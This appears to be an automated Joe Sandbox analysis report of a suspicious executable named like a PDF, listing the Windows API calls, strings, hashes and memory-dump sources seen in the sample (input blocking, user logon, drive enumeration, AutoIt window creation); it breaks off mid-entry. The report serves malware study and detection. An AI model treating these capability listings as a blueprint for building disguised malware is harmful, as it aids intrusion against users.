                                                                          • Instruction ID: 9eff63d6d478d52f28e93c8a15e071c88beeaf440938693011bde94d4a9c7ffc
                                                                          • Opcode Fuzzy Hash: 89c3d7f2bd3044f5cfec347c6a89d6b3d8d198d2677e2ffaf614444ceb8da2de
                                                                          • Instruction Fuzzy Hash: C921E4726395108FC329CF25D841A56B3E1EBA5311F288E6CD0E5CB2D0CE75BD05DB94
                                                                          APIs
                                                                          • BlockInput.USER32(00000001), ref: 00B54218
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BlockInput
                                                                          • String ID:
                                                                          • API String ID: 3456056419-0
                                                                          • Opcode ID: ca3c0315c1193d75d1defa856d380787b6af22151adc730a2b69e2baca439c55
                                                                          • Instruction ID: 86f91a206a18cbb4eea474ebef9659b9d9f323cd67e5aab83c84e877622a858b
                                                                          • Opcode Fuzzy Hash: ca3c0315c1193d75d1defa856d380787b6af22151adc730a2b69e2baca439c55
                                                                          • Instruction Fuzzy Hash: AEE04F712502149FC710EF5AE844A9BF7E8EF997A1F008066FC4AC7352DBB1E845CBA0
                                                                          APIs
                                                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00B44F18
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: mouse_event
                                                                          • String ID:
                                                                          • API String ID: 2434400541-0
                                                                          • Opcode ID: 064934f8809e8c1b6ead3a3d328576a3ed43ee08a38bfe294dd865928d8559b1
                                                                          • Instruction ID: 7cc34056f94f41af46a5403f45a6b3ebe0afd09c5465b2b36d1da4b96a2f4938
                                                                          • Opcode Fuzzy Hash: 064934f8809e8c1b6ead3a3d328576a3ed43ee08a38bfe294dd865928d8559b1
                                                                          • Instruction Fuzzy Hash: A2D05EB016821538FC184B20AC0FF760188E341781F8449C9720A954C19AE56E38B035
                                                                          APIs
                                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00B388D1), ref: 00B38CB3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: LogonUser
                                                                          • String ID:
                                                                          • API String ID: 1244722697-0
                                                                          APIs
                                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00B22242
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: NameUser
                                                                          • String ID:
                                                                          • API String ID: 2645101109-0
                                                                          APIs
                                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B0A36A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ExceptionFilterUnhandled
                                                                          • String ID:
                                                                          • API String ID: 3192549508-0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          APIs
                                                                          • DeleteObject.GDI32(00000000), ref: 00B57B70
                                                                          • DeleteObject.GDI32(00000000), ref: 00B57B82
                                                                          • DestroyWindow.USER32 ref: 00B57B90
                                                                          • GetDesktopWindow.USER32 ref: 00B57BAA
                                                                          • GetWindowRect.USER32(00000000), ref: 00B57BB1
                                                                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00B57CF2
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00B57D02
                                                                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57D4A
                                                                          • GetClientRect.USER32(00000000,?), ref: 00B57D56
                                                                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B57D90
                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57DB2
                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57DC5
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57DD0
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00B57DD9
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57DE8
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00B57DF1
                                                                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57DF8
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00B57E03
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57E15
                                                                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00B72CAC,00000000), ref: 00B57E2B
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00B57E3B
                                                                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00B57E61
                                                                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00B57E80
                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B57EA2
                                                                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B5808F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                          • API String ID: 2211948467-2373415609
                                                                          APIs
                                                                          • CharUpperBuffW.USER32(?,?,00B6F910), ref: 00B638AF
                                                                          • IsWindowVisible.USER32(?), ref: 00B638D3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpperVisibleWindow
                                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                          • API String ID: 4105515805-45149045
                                                                          APIs
                                                                          • SetTextColor.GDI32(?,00000000), ref: 00B6A89F
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00B6A8D0
                                                                          • GetSysColor.USER32(0000000F), ref: 00B6A8DC
                                                                          • SetBkColor.GDI32(?,000000FF), ref: 00B6A8F6
                                                                          • SelectObject.GDI32(?,?), ref: 00B6A905
                                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 00B6A930
                                                                          • GetSysColor.USER32(00000010), ref: 00B6A938
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00B6A93F
                                                                          • FrameRect.USER32(?,?,00000000), ref: 00B6A94E
                                                                          • DeleteObject.GDI32(00000000), ref: 00B6A955
                                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 00B6A9A0
                                                                          • FillRect.USER32(?,?,?), ref: 00B6A9D2
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6A9FD
                                                                            • Part of subcall function 00B6AB60: GetSysColor.USER32(00000012), ref: 00B6AB99
                                                                            • Part of subcall function 00B6AB60: SetTextColor.GDI32(?,?), ref: 00B6AB9D
                                                                            • Part of subcall function 00B6AB60: GetSysColorBrush.USER32(0000000F), ref: 00B6ABB3
                                                                            • Part of subcall function 00B6AB60: GetSysColor.USER32(0000000F), ref: 00B6ABBE
                                                                            • Part of subcall function 00B6AB60: GetSysColor.USER32(00000011), ref: 00B6ABDB
                                                                            • Part of subcall function 00B6AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B6ABE9
                                                                            • Part of subcall function 00B6AB60: SelectObject.GDI32(?,00000000), ref: 00B6ABFA
                                                                            • Part of subcall function 00B6AB60: SetBkColor.GDI32(?,00000000), ref: 00B6AC03
                                                                            • Part of subcall function 00B6AB60: SelectObject.GDI32(?,?), ref: 00B6AC10
                                                                            • Part of subcall function 00B6AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00B6AC2F
                                                                            • Part of subcall function 00B6AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B6AC46
                                                                            • Part of subcall function 00B6AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00B6AC5B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                          • String ID:
                                                                          • API String ID: 4124339563-0
                                                                          • Opcode ID: abcf856f08fc5823aa1a8ee09439771c81dfc0be59ad0e94b044f0654c39f395
                                                                          • Instruction ID: afc9759ebb9f094afb669849386e47453cf3ad8d41350a6d9723817335b064fa
                                                                          • Opcode Fuzzy Hash: abcf856f08fc5823aa1a8ee09439771c81dfc0be59ad0e94b044f0654c39f395
                                                                          • Instruction Fuzzy Hash: DEA17472408302AFDB109F64EC48A6B7BE9FF89321F104A29F552A71E1DB79D944CF52
                                                                          APIs
                                                                          • DestroyWindow.USER32(?,?,?), ref: 00AE2CA2
                                                                          • DeleteObject.GDI32(00000000), ref: 00AE2CE8
                                                                          • DeleteObject.GDI32(00000000), ref: 00AE2CF3
                                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 00AE2CFE
                                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 00AE2D09
                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B1C68B
                                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B1C6C4
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B1CAED
                                                                            • Part of subcall function 00AE1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AE2036,?,00000000,?,?,?,?,00AE16CB,00000000,?), ref: 00AE1B9A
                                                                          • SendMessageW.USER32(?,00001053), ref: 00B1CB2A
                                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B1CB41
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B1CB57
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B1CB62
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                          • String ID: 0
                                                                          • API String ID: 464785882-4108050209
                                                                          • Opcode ID: 69fae1537e89e096493d99fad504458a85ee3e3f195ed82e55b30eb5a97eba18
                                                                          • Instruction ID: 55b7b825f47dac8a8fa9dbbf7b54e51d11ba21e97fffe71f5ecc899988374799
                                                                          • Opcode Fuzzy Hash: 69fae1537e89e096493d99fad504458a85ee3e3f195ed82e55b30eb5a97eba18
                                                                          • Instruction Fuzzy Hash: 1012AF30644241EFDB11CF24C884BB9BBE5FF45310FA445A9E596DB2A2CB71EC81CB91
                                                                          APIs
                                                                          • DestroyWindow.USER32(00000000), ref: 00B577F1
                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B578B0
                                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B578EE
                                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B57900
                                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B57946
                                                                          • GetClientRect.USER32(00000000,?), ref: 00B57952
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B57996
                                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B579A5
                                                                          • GetStockObject.GDI32(00000011), ref: 00B579B5
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00B579B9
                                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B579C9
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B579D2
                                                                          • DeleteDC.GDI32(00000000), ref: 00B579DB
                                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B57A07
                                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00B57A1E
                                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B57A59
                                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B57A6D
                                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00B57A7E
                                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B57AAE
                                                                          • GetStockObject.GDI32(00000011), ref: 00B57AB9
                                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B57AC4
                                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B57ACE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                          • API String ID: 2910397461-517079104
                                                                          • Opcode ID: ef577038f10b91f7e40b646ab704b5f59be54d3cabeaade80405888cc40e4f07
                                                                          • Instruction ID: af521fdefce7d608e4623568f9bf5e8539ab0a1fde3b77c0cf7630fe9ddeac22
                                                                          • Opcode Fuzzy Hash: ef577038f10b91f7e40b646ab704b5f59be54d3cabeaade80405888cc40e4f07
                                                                          • Instruction Fuzzy Hash: 2FA181B1A40219BFEB14DBA5DC4AFAE7BA9EB49710F144154FA14A71E0CBB4AD00CB60
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 00B4AF89
                                                                          • GetDriveTypeW.KERNEL32(?,00B6FAC0,?,\\.\,00B6F910), ref: 00B4B066
                                                                          • SetErrorMode.KERNEL32(00000000,00B6FAC0,?,\\.\,00B6F910), ref: 00B4B1C4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorMode$DriveType
                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                          • API String ID: 2907320926-4222207086
                                                                          • Opcode ID: 9d48cc12b17700d4bbdc3d96a2bbe8c035616d4b3d6da4e5d7b8b38bb09e2dd1
                                                                          • Instruction ID: d58ceda50a705dd554ec5f5cb341684e7e782edb78027d6ad4ea74982996fb25
                                                                          • Opcode Fuzzy Hash: 9d48cc12b17700d4bbdc3d96a2bbe8c035616d4b3d6da4e5d7b8b38bb09e2dd1
                                                                          • Instruction Fuzzy Hash: 68518130694345ABCF04DB50CAA2E7D73F1EB54741B2040E5E60AB72A1DB79DF41EB82
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
